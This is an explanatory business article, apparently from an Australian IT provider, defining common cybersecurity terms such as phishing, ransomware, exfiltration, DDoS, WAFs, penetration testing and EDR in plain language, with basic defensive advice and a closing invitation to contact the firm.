Cyber security incidents are becoming more frequent and more costly — and the trend isn't reversing. Criminals target businesses of all sizes, and Australian organisations in particular have been headline news repeatedly in recent years. Knowing the terminology isn't just useful for IT teams: business owners and managers who understand these concepts make better decisions about where to invest in protection and when to take a reported risk seriously.

This article covers the most important terms in plain language — what they mean, how they relate to each other, and why they matter to your business.

How attackers get in — attack vectors

An attack vector is any method an attacker can use to gain unauthorised access to a system. Think of it as a door into your business. Some are obvious — a login page with a weak password. Others are subtle — a member of staff forwarding an email from someone pretending to be the CEO. Understanding common attack vectors helps you prioritise where to focus your defences.

Vulnerabilities and bugs

Software is written by humans, and humans make mistakes. These mistakes produce bugs — errors in how the software behaves. Most bugs are inconvenient but harmless. Some, however, create security weaknesses that can be exploited. These are called vulnerabilities.

Vulnerabilities are what security patches address. When a software vendor releases an update that fixes a security issue, they're closing off a known vulnerability before (or after) attackers can exploit it. This is why keeping software patched and updated is one of the most basic and impactful things a business can do for security.

Zero-days

A zero-day vulnerability is one that the software vendor doesn't yet know about. The name comes from the fact that the vendor has had zero days to develop a fix. These are particularly dangerous because, by definition, no patch exists — patching your software doesn't protect you from a zero-day until the vendor discovers and fixes it.

Zero-days are sometimes discovered by security researchers who report them responsibly to vendors before disclosing them publicly. Sometimes they're discovered by malicious actors first, and exploited quietly before anyone else is aware. Zero-day exploits are typically sophisticated and expensive to develop — they tend to be used in targeted attacks against high-value targets rather than mass campaigns, though this isn't always the case.

Phishing

Phishing is an attack designed to trick people into handing over credentials, financial information, or access they shouldn't share. The most familiar form is email phishing — a message that looks like it came from a bank, a government agency, or a trusted supplier, with a link to a fake login page designed to capture your username and password.

Email phishing has evolved significantly. Modern campaigns use personalised information about the target (sometimes called spear phishing), making the messages far more convincing than the obvious scam emails of the past. Businesses are frequently targeted through fake invoice emails, fake supplier payment updates, or messages impersonating the business owner requesting urgent transfers.

Social engineering

Social engineering is the broader category that phishing falls into. Where phishing uses fake messages, social engineering includes any attack that manipulates people through deception rather than exploiting technical vulnerabilities.

Impersonation is a common form — someone calling your accounts team pretending to be a supplier and requesting a bank account change for future payments. Another form is pretexting — building a convincing false scenario over time to gain the trust needed to obtain access or information. The common thread is that these attacks target people rather than systems, which means technical security controls alone can't stop them.

What happens once attackers are in — malicious payloads

Getting past the door is only the first step. Once inside, an attacker needs something to do the damage — this is the malicious payload.

Malware

Malware is the umbrella term for any software designed to cause harm. Viruses, ransomware, spyware, trojans — these are all types of malware. The word simply means "malicious software." When people talk about protecting against malware, they're talking about protecting against this entire category.

Ransomware

Ransomware deserves specific mention because it's the most common and financially damaging form of malware targeting Australian businesses right now. Ransomware infects a system, spreads through connected devices, and then encrypts files — making them inaccessible to the business. The attacker then demands payment to provide the decryption key.

Even businesses that pay don't always get their data back. And the cost goes beyond the ransom itself: downtime, recovery, reputational damage, regulatory notifications. Ransomware incidents have shut down Australian businesses for days or weeks at a time. Backups that are kept offline and isolated from the main network are the most effective defence — if your files are encrypted, you restore from a clean backup rather than negotiating with criminals.

Exfiltration

Data exfiltration refers to the unauthorised extraction of data from a business — copying sensitive information out to a location controlled by the attacker. This can happen alongside ransomware (modern ransomware operators frequently steal data before encrypting it, giving them double leverage) or independently through a quieter intrusion.

Exfiltration is what makes Australian data breach notification obligations relevant. If a business experiences a breach involving personal information likely to result in serious harm, the Australian Privacy Act requires notification to the Office of the Australian Information Commissioner and affected individuals. The penalties for failing to notify have increased significantly in recent years.

DDoS attacks

A Distributed Denial of Service (DDoS) attack doesn't aim to steal data — it aims to take a service offline. The attacker floods a target's network or servers with traffic from many sources simultaneously, overwhelming its capacity to respond to legitimate requests. The result is a service that's slow or completely inaccessible to your customers.

DDoS attacks are sometimes used as extortion — pay up or the attack continues — and sometimes simply to cause disruption. Businesses that depend on their website or online services being available are most exposed.

How to defend against it

Firewalls and web application firewalls (WAFs)

A firewall is a security control that sits between a trusted network (your office) and an untrusted one (the internet), deciding which traffic is allowed to pass in each direction based on configured rules. Modern firewalls go well beyond simple port filtering — they can inspect traffic, identify and block known threats, and enforce policies about what can and can't be accessed.

A Web Application Firewall (WAF) operates at the application layer rather than the network layer. Where a regular firewall looks at where traffic is coming from and where it's going, a WAF looks at the content of that traffic in the context of the application it's targeting. WAFs are used to protect web-facing applications from attacks like SQL injection and cross-site scripting — attack types that look legitimate to a standard firewall but are malicious at the application level.

Penetration testing and vulnerability scanning

Penetration testing (often shortened to pen testing) involves authorised security professionals attempting to break into your systems using the same methods a real attacker would. The goal is to find weaknesses before the attackers do. A pen test produces a detailed report of what was found and how it should be addressed.

Pen testing is thorough but resource-intensive — it's typically done periodically, not continuously. Vulnerability scanning provides a more automated, ongoing alternative: software tools continuously scan your systems against databases of known vulnerabilities and flag anything that needs attention. The two approaches complement each other rather than compete.

EDR — Endpoint Detection and Response

Traditional antivirus software works by comparing files and processes against a database of known malicious signatures. If a piece of malware doesn't match a known signature, it's not flagged. This approach has significant limitations against modern attacks, which increasingly use novel techniques to evade signature-based detection.

EDR (Endpoint Detection and Response) takes a different approach. Rather than looking for known bad signatures, EDR monitors the behaviour of software running on devices — flagging activity that looks suspicious even if the software itself isn't in any database. This makes it considerably more effective against zero-days, novel malware, and "living off the land" attacks that use legitimate system tools for malicious purposes.

You don't need to be an expert to be informed. Understanding what these terms mean helps you ask the right questions of your IT team or provider, evaluate security advice properly, and make better decisions about where to invest in protection. If you'd like to discuss your current security setup, our team is happy to have that conversation.

Cyber security can feel overwhelming, particularly for businesses without dedicated IT staff. But the fundamentals — patched software, strong credentials with multi-factor authentication, tested backups, staff awareness, and a firewall configured by someone who knows what they're doing — address the majority of real-world risk. Talk to our team if you'd like help assessing where your business currently stands.